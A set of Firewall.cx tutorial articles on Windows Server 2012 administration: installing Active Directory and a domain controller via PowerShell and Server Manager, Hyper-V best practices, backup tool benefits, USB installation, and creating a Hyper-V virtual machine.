Another method of installing an Active Directory Services Role &  Domain Controller is with the use of Windows PowerShell. PowerShell is a powerful scripting tool and an alternative to the Windows GUI wizard we covered in our previous article. Open PowerShell as an Administrator and type the following cmdlet to check for the Active Directory Domain Services Role availability:

PS C:\Users\Administrator> Get-WindowsFeature AD-Domain-Services

The system should return the Install State as Available, indicating the role is available for immediate installation. We can now safely proceed to the next step.

Install Active Directory Services Role & Domain Controller Using Windows PowerShell

To initiate the installation of Active Directory Services Role on Windows Server 2012 R2, issue the following cmdlet:

PS C:\Users\Administrator> Install-WindowsFeature –Name AD-Domain-Services

The system will immediately begin the installation of the Active Directory Domain Services role and provide an update of the installation's progress:

windows-2012-active-directory-powershell-1

Figure 1. Installing Active Directory Domain Services with PowerShell

Once the installation is complete, the prompt is updated with a success message (Exit Code) as shown below:

windows-2012-active-directory-powershell-2

Figure 2. Finished Installing ADDS with PowerShell

Next step is to promote the server to an active directory domain controller. To do so, you need to perform the prerequisite installation at the forest level by typing the following cmdlet in PowerShell:

PS C:\Users\Administrator> Test-ADDSForestInstallation

The following figure shows the command execution and system output:

windows-2012-active-directory-powershell-3

Figure 3. Prerequisite Installation

Now it's time to promote the server to a domain controller. For this step, we need to save all parameters in a PowerShell script (using notepad), which will then be used during the domain controller installation.

FREE Hyper-V & VMware Backup:  FREE for Firewall.cx readers for a Limited Time!  Download Now!

Below are the options we used - these are identical to what we selected in our GUI Wizard installation covered in our Windows Server 2012 Active Directory Services role and Domain Controller installation using the Windows Server Manager (GUI) article:

#
# Windows PowerShell script for AD DS Deployment
#
Import-Module ADDSDeployment
Install-ADDSForest
-CreateDnsDelegation:$false
-DatabasePath "C:\Windows\NTDS"
-DomainMode "Win2012R2"
-DomainName "firewall.local"
-DomainNetbiosName "FIREWALL"
-ForestMode "Win2012R2"
-InstallDns:$true
-LogPath "C:\Windows\NTDS"
-NoRebootOnCompletion:$false
-SysvolPath "C:\Windows\SYSVOL"
-Force:$true

Save the script at an easy accessible location e.g Desktop, with the name InstallDC.ps1.

Before running the script, we need to change the execution policy of PowerShell to remote signed. This is accomplished with the following cmdlet:
PS C:\Users\Administrator\Desktop> Set-executionpolicy remotesigned

The following figure shows the command execution and system output:

windows-2012-active-directory-powershell-4

Figure 4. Changing the Execution Policy of PowerShell

Now we can execute our script from within PowerShell by changing the PowerShell directory to the location where the script resides and typing the following cmdlet:

PS C:\Users\Administrator\Desktop> .\InstallDC.ps1

Once executed, the server is promoted to Domain Controller and installation updates are provided at the PowerShell prompt:

windows-2012-active-directory-powershell-4

Figure 5. Promoting Server to Domain Controller

After the installation is complete, the server will reboot and the server will have Active Directory Domain Services installed with the server being a Domain Controller.

This completes the installation and setup of Windows 2012 Active Directory Services Role & Domain Controller using Windows 2012 PowerShell.

FREE Hyper-V & VMware Backup:  FREE for Firewall.cx readers for a Limited Time!  Download Now!

  • Hits: 18915

Installing Windows Server 2012 Active Directory via Server Manager. Active Directory Concepts

This article serves as an Active Directory tutorial covering installation and setup of a Windows 2012 Domain Controller using Windows Server Manager (GUI).

Readers interested in performing the installation via Windows PowerShell can read this article.

FREE Hyper-V & VMware Backup:  FREE for Firewall.cx readers for a Limited Time!  Download Now!

What is Active Directory?

Active Directory is a heart of Windows Server operating systems. Active Directory Domain Services (AD DS) is a central repository of active directory objects such as user accounts, computer accounts, groups, group policies and so on. Similarly, Active Directory authenticates user accounts and computer accounts when they login into the domain. Computers must be joined to the domain in order to authenticate Active Directory users.

Active Directory is a database that is made up of several components which are important for us to understand before attempting to install and configure Active Directory Services on Windows Server 2012. These components are:

  1. Domain Controller (DC): - Domain Controllers are servers where the Active Directory Domain Services role is installed. The DC stores copies of the Active Directory Database (NTDS.DIT) and SYSVOL (System Volume) folder.
  2. Data Store: - It is the actual file (NTDS.DIT) that stores the Active Directory information.
  3. Domain: - Active Directory Domain is a group of computers and user accounts that share common administration within a central Active Directory database.
  4. Forest: - Forest is a collection of Domains that share common Active Directory database. The first Domain in a Forest is called a Forest Root Domain.
  5. Tree: - A tree is a collection of domain names that share common root domain.
  6. Schema: - Schema defines the list of attributes and object types that all objects in the Active Directory database can have.
  7. Organizational Units (OUs): - OUs are simply container or folders in the Active Directory that stores other active directory objects such as user accounts, computer accounts and so on. OUs are also used to delegate control and apply group policies.
  8. Sites: - Sites are Active Directory object that represent physical locations. Sites are configured for proper replication of Active Directory database between sites.
  9. Partition: - Active Directory database file is made up of multiple partitions which are also called naming contexts. The Active Directory database consists of partitions such as application, schema, configuration, domain and global catalog.

Installing Active Directory Domain Controller In Server 2012

In Windows Server 2012, the Active Directory Domain Controller role can be installed using the Server Manager or alternatively, using Windows PowerShell. The figure below represents our lab setup which includes a Windows Server 2012 (FW-DC01) waiting to have the Active Directory Domain Services server role installed on it:

windows-2012-active-directory-installation-1

Notice that there are two Windows 8 clients waiting to join the Active Directory domain once installed.

A checklist before installing a Domain Controller in your network is always recommended. The list should include the following information:

  • Server Host Name – A valid Hostname or Computer Name must be assigned to domain controller. We've selected FW-DC01 as a server's host name.
  • IP Address – You should configure a static IP address, which will not be changed later on. In our example, we've used 192.168.1.1/24 which is a Class C IP address.
  • Domain Name – Perhaps one of the most important items on our checklist. We've used firewall.local for our setup. While many will want to use an existing public domain, e.g their company's domain, it is highly recommended this practice is avoided at all costs as it can create a number of problems with DNS resolution when internal hosts or servers are trying to resolve hosts that exist on both private and public name spaces.

Microsoft doesn't recommend the usage of a public domain name in an internal domain controller, which is why we selected firewall.local instead of firewall.cx.

Installing Active Directory Domain Controller Using Server Manager

Initiating the installation of Active Directory is a simple process; however it does require Administrator privileges. Open Server Manager, go to Manage and select Add Roles and Features:

Figure 2. Add Roles and Features

Click Next on the Before you begin page.

On the next screen, choose Role-based or feature-based Installation and click Next:

windows-2012-active-directory-installation-3

 Figure 3. Choose Role Based Installation

Select the destination server by choosing Select a server from the server pool option and select the server and click Next. In cases like our lab where there is only one server available, it must be selected:

windows-2012-active-directory-installation-4

 Figure 4. Select Destination Server

In the Select server roles page, select the Active Directory Domain Services role and click Next:

windows-2012-active-directory-installation-5

Figure 5. Select AD DS role

The next page is the Features page which we can safely skip by clicking Next

The Active Directory Domain Services page contains limited information on requirements and best practices for Active Directory Domain Services:

windows-2012-active-directory-installation-6

Figure 6. AD DS Page

Once you've read the information provided, click Next to proceed to the final confirmation page.

FREE Hyper-V & VMware Backup:  FREE for Firewall.cx readers for a Limited Time!  Download Now!

On the confirmation page, select Restart the destination server automatically if required and click on the Install button. By clicking Install, you confirm you are ready to begin the AD DS role installation:

windows-2012-active-directory-installation-7

Figure 7. AD DS Confirmation

Note: You cannot cancel a role installation once it begins

The Add Roles and Feature Wizard will continuously provide updates during the Active Directory Domain Services role installation, as shown below:

windows-2012-active-directory-installation-8

Figure 8. Installation Progress

Once the installation has completed successfully, we should expect to see the Installation succeeded message under the installation progress bar:

windows-2012-active-directory-installation-9

Figure 9. Successful Installation & Promote Server to DC

Promoting Server To Domain Controller

At this point we can choose to Promote this server to a domain controller by clicking on the appropriate link as highlighted above (Blue arrow).

After selecting the Promote this server to a domain controller option, the Deployment Configuration page will appear. Assuming this is the first domain controller in the network, as is in our case, select the Add a new forest option to setup a new forest, and then type the fully qualified domain name under root domain name section. We've selected to use firewall.local:

windows-2012-active-directory-installation-10

Figure 10. Configure Domain Name

Administrators who already have active directory installed would most likely select the Add a domain controller to an existing domain option. Having at least two Domain Controllers is highly advisable for redundancy purposes. When done click the Next button.

Now select Windows Server 2012 R2 for the Forest functional level and Domain functional level. By setting the domain and forest functional levels to the highest value that your environment can support, you'll be able to use as many Active Directory Domain Services as possible. If for example you do not plan to ever add domain controllers running Windows 2003, but might add a Windows 2008 server as a domain controller, you would select Windows Server 2008 for the Domain functional level. Next, click on the Domain Name System (DNS) server option as shown in the below figure:

windows-2012-active-directory-installation-11

Figure 11. DC Capabilities

The DNS Server role can be later on installed. If for any reason you need to install the DNS Server role later on, please read our How to Install and Configure Windows 2012 DNS Server Role article.

Since this is the first domain controller in the forest, Global Catalog (GC) will be selected by default. Now set the Directory Services Restore Mode (DSRM) password. DSRM is used to restore active directory in case of failure. Once done, click Next.

The next window is the DNS Options page. Here we might encounter the following error which can be safely ignored simply because of the absence of a DNS server (which we are about to install):

A delegation for this DNS server cannot be created because the authoritative parent zone cannot be found...

Ignore the error and click Next to continue.

In the next window, Additional Options, leave the default NetBIOS domain name and click Next. The Windows AD DS wizard will automatically remove the .local from the domain name to ensure compatibility with NetBIOS name resolution:

windows-2012-active-directory-installation-12

Figure 12. Additional Options

The next step involves the Paths selection which allows the selection of where to install the Database, Log Files and SYSVOL folders. You can either browse to a different location or leave the default settings (as we did). When complete, click Next:

windows-2012-active-directory-installation-13

Figure 13. Paths

Note: When the installation is complete, the Database folder will contain a file named NTDS.DIT. This important file is database file of your active directory.

Finally, the next screen allows us to perform a quick review of all selected options before initiating the installation: Once reviewed, click Next.

windows-2012-active-directory-installation-14

Figure 14. Review Options

The server will now perform some prerequisites check. If successful, it will show green check mark on the top. Some warnings may appear, however if these are non-critical, we can still proceed with the installation. Click the Install button to promote this server to domain controller:

windows-2012-active-directory-installation-15

Figure 15. Prerequisites Check

The installation begins and the server's installation progress is continuously updated:

windows-2012-active-directory-installation-16

Figure 16. Installation Begins

When the installation of Active Directory is complete, the server will restart.

Assuming we've restarted, we can now open Active Directory Users and Computers and begin creating user accounts, computer accounts, apply group policies, and so on.

windows-2012-active-directory-installation-17

Figure 17. Active Directory Users and Computers

As expected, under the Domain Controllers section, we found our single domain controller. If we were to add our new domain controller to an existing active directory, then we would expect to find all domain controllers listed here.

FREE Hyper-V & VMware Backup:  FREE for Firewall.cx readers for a Limited Time!  Download Now!

  • Hits: 30226

Hyper-V Best Practices - Replica, Cluster, Backup Advice

hyper-v-best-practices-1aHyper-V has proven to be a very cost effective solution for server consolidation. Evidence of this is also the fact that companies are beginning to move from VMware to the Hyper-V virtualization platform. This article will cover the Windows 2012 Hyper-V best practices, and aims to help you run your Hyper-V virtualization environment as optimum as possible.

Keeping your Hyper-V virtualization infrastructure running as smoothly as possible can be a daunting task, which is why we recommend engineers follow the best Hyper-V practices.

Different organizations have different setups and requirements: some of you might be moving from VMware to Hyper-V virtualization, while others might be upgrading from an older Hyper-V virtualization server to a newer one. Each scenario must follow the baseline or best practices,  to be able to run the virtualization infrastructure successfully – without problems.

FREE Hyper-V Backup:  Easy to use - Powerful features - Just works, no hassle:   It's FREE for Firewall.cx readers!  Download Now!

Hyper-V Best Practice List

Best practices for Hyper-V vary considerably depending on whether you're using clustered servers. As a general rule-of-thumb the best thing you can do is try to configure your host server and your Virtual Machines in a way that avoids resource contention to the greatest extent possible.

Organizations who are considering migrating their infrastructure to Hyper-V, or are currently running on the Hyper-V virtualization platform, need to take note of the below important points that must not be overlooked:

Processor

Minimum: A 1.4 GHz 64-bit processor with hardware-assisted virtualization. This feature is available in processors that include a virtualization option—specifically, processors with Intel Virtualization Technology (Intel VT) or AMD Virtualization (AMD-V) technology.
Hardware-enforced Data Execution Prevention (DEP) must also be available and enabled. For Intel CPUs, this translates to enabling the Intel XD (“execute disable”) bit or while for AMD CPUs, the AMD NX (“no execute”) bit.

Memory

Minimum: 512 MB.  This is the bare minimum; however a logical approach would be at least 4 Gigs of RAM per virtual server.  If one physical server is to host 4 Virtual Machines, then we would recommend at least 16GBs of Physical RAM, if not more.  SQL servers and other RAM intensive services would certainly lift the memory requirements a lot higher. You can never have enough memory.

Network Adapters

At least one network adapter is required, but two or more are always recommended. Hyper-V allows the creation of three different virtual switches: Internal Virtual Switches, Private Virtual Switches and External Virtual Switches.

Internal virtual switches are used to allow the virtual machine to connect with its host machine (the physical machine that run’s Hyper-V). Private virtual switches are used when we only want to connect virtual machines, which run on the same host, between each other.  External virtual switches are used to allow the virtual machine to connect with our LAN network and this is where physical network adapters come in hand.   
Host machines with only one network adapter will be forced to share that network adapter with all its virtual machines. This is why it’s always best practice to have at least two network adapters available. 

Additional Considerations

The settings for hardware-assisted virtualization and hardware-enforced DEP are usually available from within in the system’s BIOS; however, the names of the settings may differ from the names identified previously.
For more information about whether a specific processor model supports Hyper-V (virtualization), it is recommended to check at the manufacturer’s website.

As noted before, it is important to remember after modifying the settings for hardware-assisted virtualization or hardware-enforced DEP, you may need to turn off the power to the server and then turn it back on to ensure the new CPU settings are loaded.

Microsoft Assessment & Planning Toolkit

Microsoft Assessment and Planning Toolkit (MAP) can be used to study existing infrastructure and determine the Hyper-V requirement. For organizations who are interested in server consolidation and virtualization through technologies such as Hyper-V, MAP helps gather performance metrics and generate server consolidation recommendations that identify the candidates for server virtualization and will even suggest how the physical servers might be placed in a virtualized environment.

The diagram below shows the MAP phases involved to successfully create the necessary reports:

hyper-v-best-practices-1

Figure 1. MAP Phases

Below is an overview of the Microsoft Assessment and Planning Toolkit application:

hyper-v-best-practices-2

Figure 2. MAP Overview

The following points are the best practices which should be considered before deploying your Windows Server 2012 Hyper-V infrastructure:

Hyper-V Hosts (Physical Servers)

  • Ensure hosts are up-to-date with recommended Microsoft updates
  • Ensure hosts have the latest BIOS version, as well as other hardware devices (such as Synthetic Fiber Channel, NIC’s, Raid bios, etc.)
  • Hosts must be part of a domain before you can create a Hyper-V High-Availability Cluster.
  • RDP Printer Mapping should be disabled on hosts, to remove any chance of a printer driver causing instability issues on the host machine. To do this, follow the below steps: Computer Configuration –> Policies –> Administrative Templates –> Windows Components –> Remote Desktop Services –> Remote Desktop Session Host –> Printer Redirection –> Do not allow client printer redirection –> Set to "Enabled”
  • Do not install any other Roles on a host besides the Hyper-V role and the Remote Desktop Services roles. Optionally, if the host will become part of a cluster, you can install Failover Cluster Manager. In the event the host connects to an iSCSI SAN and/or Fiber Channel, you can also install Multipath I/O.
  • Anti-virus software should exclude Hyper-V specific files using the Hyper-V: Antivirus Exclusions for Hyper-V Hosts article available from Microsoft.
  • Default path for Virtual Hard Disks (VHD/VHDX) should be set to a non-system drive, due to this can cause disk latency as well as create the potential for the host running out of disk space.
  • If you are using iSCSI: In Windows Firewall with Advanced Security, enable iSCSI Service (TCP-In) for Inbound and iSCSI Service (TCP-Out) for outbound in Firewall settings on each host. This will ensure iSCSI traffic is allowed to pass from host to the SAN device and back. Not enabling these rules will prevent iSCSI communication. To set the iSCSI firewall rules via netsh, you can use the following command:

PS C:\Windows\system32> Netsh advfirewall firewall set rule group=”iSCSI Service” new enable=yes

  • Periodically run performance counters against the host, to ensure optimal performance. Recommend using the Hyper-V performance counter that can be extracted from the (free) Codeplex PAL application.

Hyper-V Virtual Machines

  • Ensure you are running only supported guests in your environment.
  • Ensure you are using sophisticated backup software such as Altaro’s Hyper-V Backup which also includes free lifetime backup for a specific amount of VMs
  • If you are converting VMware virtual machines to Hyper-V, consider using MVMC (a free, stand-alone tool offered by Microsoft) or VMM.
  • Disk2vhd is a Tool which can be used to convert a Physical Machine to a Hyper-V Virtual Machine (P2V). The VHD file created can then be imported in to Hyper-V.
FREE Hyper-V Backup:  FREE for Firewall.cx readers for a Limited Time!  Download Now!

Hyper-V Physical NICs

  • Ensure Network Adapters have the latest firmware and drivers, which often address known issues with hardware and performance.
  • TCP Chimney Offload is not supported with Server 2012 software-based NIC teaming, because TCP Chimney has the entire networking stack offloaded to the NIC. If however software-based NIC teaming is not used, you can leave TCP Chimney Offload enabled. To disable TCP Chimney Offload, from an elevated command-prompt, type the following command:

PS C:\Windows\system32> netsh int tcp set global chimney=disabled

  • Jumbo frames should be turned on and set for 9000 or 9014 (depending on your hardware) for CSV, iSCSI and Live Migration networks. To verify Jumbo frames have been successfully configured, run the following command from all your Hyper-V host(s) to your iSCSI SAN:

PS C:\Windows\system32> ping 10.50.2.35 –f –l 8000

This command will ping the SAN (e.g. 10.50.2.35) with an 8K packet from the host. If replies are received, Jumbo frames are properly configured. Note that in the case a network switch exists between the host and iSCSI SAN, Jumbo frames must be enabled on that as well.

hyper-v-best-practices-3

 Figure 3. Jumbo Frame Ping Test

  • Management NIC should be at the top (1st) in NIC Binding Order. To set the NIC binding order: Control Panel --> Network and Internet --> Network Connections. Next, select the advanced menu item, and select Advanced Settings. In the Advanced Settings window, select your management network under Connections and use the arrows on the right to move it to the top of the list.
  • If using NIC teaming inside a guest VM, follow this order: Open the settings of the Virtual Machine, Under Network Adapter, select Advanced Features, in the right pane, under Network Teaming, tick the “Enable this network adapter to be part of a team in the guest operating system”. Once inside the VM, open Server Manager. In the All Servers view, enable NIC Teaming from Server:

hyper-v-best-practices-4

Figure 4. Enable NIC Teaming

Hyper-V Disks

  • New disks should use the VHDX format. Disks created in earlier Hyper-V iterations should be converted to VHDX, unless there is a need to move the VHD back to a 2008 Hyper-V host.
  • Disk used for CSV must be partitioned with NTFS. You cannot use a disk for a CSV that is formatted with FAT, FAT32, or Resilient File System (ReFS).
  • Disks should be fixed in a production environment, to increase disk throughput. Differencing and Dynamic disks are not recommended for production, due to increased disk read/write latency times (differencing/dynamic disks).
  • Shared Virtual Hard Disk: Do not use a shared VHDx file for the operating system disk. Servers should have a unique VHDx (for the OS) that only they can access. Shared Virtual Hard Disks are better used as data disks and for the disk witness.
  • Use caution when using snapshots. If not properly managed, snapshots can cause disk space issues, as well as additional physical I/O overhead.
  • Page file on Hyper-V Host should manage by the OS and not configured manually.
  • It is not supported to create a storage pool using Fiber Channel or iSCSI LUNs.

Hyper-V Memory

  • Use Dynamic Memory on all VMs (unless not supported).
  • Guest OS should be configured with (minimum) recommended memory

Hyper-V Clusters

  • Set preferred network for CSV communication, to ensure the correct network is used for this traffic. The lowest metric in the output generated by the PowerShell command below, will be used for CSV traffic. First, open a PowerShell command-prompt (using “Run as administrator”) Secondly, you’ll need to import the “FailoverClusters” module. Type the following at the PowerShell command-prompt:

PS C:\Windows\system32> Import-Module FailoverClusters

Next, we’ll request a listing of networks used by the host, as well as the metric assigned. This can be done by typing the following:

PS C:\Windows\system32> Get-ClusterNetwork | ft Name, Metric, AutoMetric, Role

In order to change which network interface is used for CSV traffic, use the following PowerShell command:

PS C:\Windows\system32> (Get-ClusterNetwork "CSV Network").Metric=900

This will set the network named "CSV Network" to 900

hyper-v-best-practices-5

Figure 5. Get Cluster Network

  • Set preferred network for Live Migration, to ensure the correct network(s) are used for this traffic following these steps: Open Failover Cluster Manager, Expand the Cluster , Next, right-click on Networks and select Live Migration Settings , Use the Up/Down buttons to list the networks in order from most preferred (at the top) to least preferred (at the bottom) , Uncheck any networks you do not want used for Live Migration traffic , Select Apply and then press OK , Once you have made this change, it will be used for all VMs in the cluster
  • The Host Shutdown Time (ShutdownTimeoutInMinutes registry entry) can be increased from the default time. This setting is usually increased when additional time is needed by VMs in order to ensure they have had enough time to shut down before the host reboots.

Registry Key: HKLM\Cluster\ShutdownTimeoutInMinutes 

Enter minutes in Decimal value.

Note: Changing of this registy value requires a server reboot in order to take effect:

hyper-v-best-practices-6

Figure 6. Registry Shutdown Option

  • Run the Cluster Validation periodically to remediate any issues

Hyper-V Replica

  • Run the Hyper-V Replica Capacity Planner. The Capacity Planner for Hyper-V Replica, allows you to plan your Hyper-V Replica deployment based on the workload, storage, network and server characteristics.
  • Update inbound traffic on the firewall to allowTCP port 80 and/or port 443 traffic. (In Windows Firewall, enable “Hyper-V Replica HTTP Listener (TCP-In)” rule on each node of the cluster. Shell commands to achieve the above are:

PS C:\Windows\system32> netsh advfirewall firewall set rule group="Hyper-V Replica HTTP" new enable=yes
PS C:\Windows\system32> netsh advfirewall firewall set rule group="Hyper-V Replica HTTPS" new enable=yes

  • Virtual hard disks with paging files should be excluded from replication, unless the page file is on the OS disk.
  • Test failovers should be performed monthly, at a minimum, to verify that failover will succeed and that virtual machine workloads will operate as expected after failover

Hyper-V Cluster-Aware Updating

  • Place all Cluster-Aware Updating (CAU) Run Profiles on a single File Share accessible to all potential CAU Update Coordinators. Run Profiles are configuration settings that can be saved as an XML file called an Updating Run Profile and reused for later Updating Runs.

Hyper-V SMB 3.0 File Shares

  • An Active Directory infrastructure is required, so you can grant permissions to the computer account of the Hyper-V hosts.
  • Loopback configurations (where the computer that is running Hyper-V is used as the file server for virtual machine storage) are not supported. Similarly, running the file share in VM’s that are hosted on computer nodes that will serve other VM’s is not supported.

Hyper-V Integration Services

  • Ensure Integration Services (IS) have been installed on all VMs. IC's significantly improve interaction between the VM and the physical host.

Hyper-V Offloaded Data Transfer (ODX) Usage

  • If your SAN supports ODX; you should strongly consider enabling ODX on your Hyper-V hosts, as well as any VMs that connect directly to SAN storage LUNs.
To enable ODX, open PowerShell (using ‘Run as Administrator’) and type the following:

C:\> Set-ItemProperty hklm:\system\currentcontrolset\control\filesystem -Name "FilterSupportedFeaturesMode" –Value 0

Be sure to run this command on every Hyper-V host that connects to the SAN, as well as any VM that connects directly to the SAN.

This concludes our Windows 2012 Hyper-V Best Practices article. We hope you’ve found the information provided useful and that it helps make your everyday administration a much easier task.



  • Hits: 28636

The Importance of a Hyper-V & VMware Server Backup Tool - 20 Reasons Why You Should Use One

hyper-v-backup-toolUsing Hyper-V Server virtualization technology, you can virtualize your physical environment to reduce the cost of physical hardware. As part of IT best practices, you implement monitoring solutions to monitor the Hyper-V Servers and virtual machines running on them. You also take necessary actions to provide security to production environment by means of installing antivirus software. Then it also becomes necessary that you implement a backup mechanism to restore the business services as quickly as possible using a Hyper-V Server Backup tool.

This article is written to let you know as to why it is important to choose a dedicated Hyper-V Backup tool rather than relying on the existing mechanism as explained in bullet points below.

Users interested can also read our articles on Hyper-V Concepts/VDI, how to install Hyper-V Server & creating a Virtual Machine in Hyper-V.

FREE Hyper-V & VMware Backup:  Easy to use - Powerful features - Just works, no hassle:   It's FREE for Firewall.cx readers!  Download Now!

1. Flexibility

Third-party backup products are designed in such a way that the product is easy to use when it comes to backup or restore a virtual machine running on the Hyper-V Server. For example, using third-party backup product, you can select a virtual machine to backup or restore. In case of any disaster with a virtual machine, it becomes easy for an IT administrator to use the flexible backup product’s console to restore a virtual machine from backup copies and restore the business services as quickly as possible.

2. Verification Of Restores

Third-party backup products provide features to verify restores without impacting the production workload. IT administrators can use the verification feature to restore the backup copies to a standalone environment to make sure these backup copies can be restored successfully in the future, if required.

3. Designed For Use With Hyper-V

A third-party backup product is designed to use with a specific technology. For example, SQL Server Backup products are designed to backup/restore SQL Server database. Similarly, third-party Hyper-V Backup Products are designed to use specifically with Hyper-V Servers. Since these dedicated Hyper-V backup products are integrated with Hyper-V closely, they are more trusted by the IT organizations.

4. Full Backup Copy Of Virtual Machine

Although, starting with Windows Server 2012, Hyper-V Server offers replication services, sometimes referred as Hyper-V Replica, which can be used to build a disaster recovery scenario. The replication takes place every 5 minutes and changed data are replicated to the Hyper-V Servers located on the disaster recovery site. At the disaster site, you only have changed copies to restore virtual machine from a failure. What if you need to restore the full virtual machine? In that case, you would require the full backup copy of the virtual machine which is only possible if you are using a dedicated Hyper-V backup product.

5. Maintaining Different Versions Of Backup Copies

There are several reasons to maintain different versions of backup copies. One of the reasons is to revert back configuration to a point-in-time and another reason is to restore the business services as quickly as possible from a backup copy of your choice. A dedicated Hyper-V backup product can maintain several backup copies of a virtual machine.

6. Agentless Backups/Restores

Most of the third-party Hyper-V Backup products ship without an Agent. An agent is a piece of software which is installed on a Hyper-V server with communicates with the Backup software. In case of an agentless backup software, it is easy for administrators to perform backup/restore operations without worrying about the agent’s response.

7. Timely Backing up virtual machines

As part of the standard IT process, many organizations have a strategy in place in which backups for critical IT components including virtual machines are scheduled in a timely manner. These backups ensure that in case of any disaster (including physical), the service can be restored from a backup copy taken from a dedicated backup product rather than relying on native methods. The backup copy not only allows you to restore services but also helps you understand the impact of restoring a backup copy which is older.

8. Centralized Management

Backup software ships with a centralized management tool. The centralized management tool is capable of managing multiple Hyper-V Servers and checking the backup operations on multiple Hyper-V servers from a single console.

9. Avoid Unnecessary Files Backup

Since the backup software is designed to work with a specific technology, it is designed in such a way that it excludes the files which are not necessary to include in the virtual machine backup copies. This helps in reducing the backup copy size.

10. Compression

A dedicated Hyper-V backup product offers compressing backup data before it is written to the backup drive. You can enable/disable compression for all or selected virtual machines using the third-party backup product’s console.

11. Encryption

Security is the major concern for IT organizations nowadays. Third-party Hyper-V Backup products use encryption technology to encrypt backup copies stored on a backup drive. These backup copies can only be read by the same Hyper-V backup product.

12. Backup & Offsite Location

As part of the IT processes, every organization ensures that the backup copies are kept at an off-site location and these backup copies can be retrieved easily when the disaster takes place at the production site. Native tools do not support taking backup to an off-site location. Third-party backup products can provide off-site backup feature in which backup copiescan be saved to an off-site location without requiring much network bandwidth.

13. Incremental Backup Copies

A dedicated Hyper-V backup product ensures that only changed contents are backed up rather than taking a full backup copy every time the backup job runs.

14. More Backup Options

Third-party backup products provide more backup options like taking daily backups or monthly backups which can be scheduled at a pre-defined interval using the centralized management console.

15. Backup To External Sources

Third-party Hyper-V backup products support backing up virtual machines to external sources including USB external devices, eSata External drives, USB flash drives, Fileserver network shares, NAS devices, and RDX cartriges.

16. Backup Retention Policies

Old backup copies can be deleted if they are not required. You can configure the backup retention policy for each virtual machine. A dedicated Hyper-V Backup product can take automatic actions to delete the older backup copies as per the retention policy you configure.

17. Ability To Restore Individual Files Or Folders

Without using a dedicated Hyper-V backup product, it would be difficult for IT administrators to restore individual files/folders from a virtual machine backup copy. Some backup products provide a feature called “Exchange Level Item Restore” which can be used to restore selected emails or mailboxes from a backup copy of a virtual machine.

18. Application Vendor Recommendation For Backup Products

Many of the application vendors require that an enterprise backup system is installed in the production environment to backup data of their applications running in the virtual machines. Since most of the vendors impose this requirement, or recommend to back up application data using a dedicated Hyper-V backup product, native backup tools fail to do so.

19. Error & Reporting

Error and Reporting are the main features a third-party backup product provides. It lets you take necessary actions if a failure takes place with a backup or restore operation. Using reporting feature of a backup product, you can know how many virtual machines have been backed up successfully and how many virtual machines have failed.

20. Support

In case if you’re not able to restore virtual machine from a backup copy or hit with an error during the restore or backup operation, you can always contact product support to get you out from this situation. Many third-party backup products provide 24/7 support for their products.

FREE Hyper-V & VMware Backup:  Easy to use - Powerful features - Just works, no hassle:   It's FREE for Firewall.cx readers!  Download Now!

Altaro Hyper-V Backup

Altaro Hyper-V Backup offers a simple, easy-to-use solution for backing up Hyper-V VMs. It includes features such as offsite backup, remote management, Exchange item-level Restore, Compression, Encryption, and much more at an affordable cost.

  • Hits: 14238

How to Install Windows Server 2012 from USB Flash – ISO Image

Most would remember the days we had to have a CDROM or DVDROM in order to proceed with the installation of an operating system. Today, it is very common installing an operating system direct from an ISO image. When dealing with virtualized systems, it becomes pretty much a necessity.

This article will show how to install Windows Server 2012 (the same process can be used for almost all other operating systems) from a USB Flash.

The only prerequisite for this process to work is that you have a USB Flash big enough to fit the ISO image and the server (or virtualization platform) supports booting from a USB Flash. If these two requirements are met, then it’s a pretty straight-forward process.

 FREE Hyper-V & VMware Virtualization Backup:  FREE for Firewall.cx readers for a Limited Time!  Download Now!

The Windows 7 USB-DVD Tool

The Windows 7 USB/DVD Tool is a freely distributed application available in our Administrator Utilities download section. The application is required to transfer/copy the ISO Image of the operating system we want to install, to our USB Flash. The application is also able to burn the ISO image directly on a DVD – a very hand feature.

Download a copy, install and run it on the computer where the ISO image is available.

When the tool runs, browse to the path where the ISO image is located. Once selected, click on Next:

Installing Windows 2012 via USB Flash

At this point, we can choose to copy the image to our USB device (USB Flash) or directly on to a DVD. We select the USB Device option:

windows-2012-installation-usb-flash-2

In the next screen, we are required to select the correct USB device. If there are more than one USB storage devices connected, extra care must be taken to ensure the correct USB Flash is selected. In case no USB Flash has been connected, insert it now into your USB port and click on the refresh button for it to appear:

windows-2012-installation-usb-flash-3

After selecting the appropriate USB device, click on Begin Copying to start the transfer of files to the USB Flash:

windows-2012-installation-usb-flash-4

Once the copy process is complete, we are ready to remove our USB Flash and connect it to our server:

windows-2012-installation-usb-flash-6

 FREE Hyper-V & VMware Virtualization Backup:  FREE for Firewall.cx readers for a Limited Time!  Download Now!

This completes our article on how to install Windows Server 2012 from USB Flash device. We recommend users visit our Windows 2012 section and browse our growing database of high-quality Windows 2012 and Hyper-V Virtualization articles.

  • Hits: 51418

Creating a Virtual Machine in Windows Hyper-V. Configuring Virtual Disk, Virtual Switch, Integration Services and other Components

Our previous articles covered basic concepts of Virtualization along with the installation and monitoring of Windows 2012 Hyper-V. This article takes the next step, which is the installation of a guest host (Windows 8.1) on our Windows 2012 Hyper-V enabled server. The aim of this article is to show how easily a guest operating system can be installed and configured, while explaining the installation and setup process. Additional Windows 2012 Server and Hyper-V technical articles can be found in our Windows 2012 Server section.

FREE Hyper-V & VMware Backup: Easy to use - Powerful features - Just works, no hassle: It's FREE for Firewall.cx readers! Download Now!

Steps To Create A Virtual Machine In Hyper-V

To begin the creation of our first virtual machine, open the Hyper-V manager in Windows Server 2012. On the Actions pane located on the right side of the window, click New and select Virtual Machine:

windows-hyper-v-host-1

 

Read the Before you begin page which contains imporant information and then click Next:

Windows Hyper-V Creating new VM

Type name of the virtual machine and configure the location to store virtual hard disk of this virtual machine. On server systems with shared storage devices, the virtual hard disk is best stored on the shared storage for performance and redundancy reasons, otherwise select a local hard disk drive. For the purpose of this lab, we will be using the server’s local C Drive:

Choose the generation of virtual machine and click Next. Generation 2 is new with Server 2012 R2. If the guest operating system will be running Windows Server 2012 or 64bit Windows 8, 8.1, select Generation 2, otherwise select Generation 1:

Hyper-V Installing VM & Selecting VM Generation

Next step involves assigning the amount of necessary memory. Under Assign Memory configure the memory and click Next. For the purpose of this lab, we will give our Windows 8.1 guest operating system 1 GB memory:

Hyper-V Assigning Memory to VM

Under configure networking tab, leave the default setting and click Next. You can create virtual switches later and re-configure the virtual machine settings as required:

Hyper-V Installing VM - Configuring VM Switch

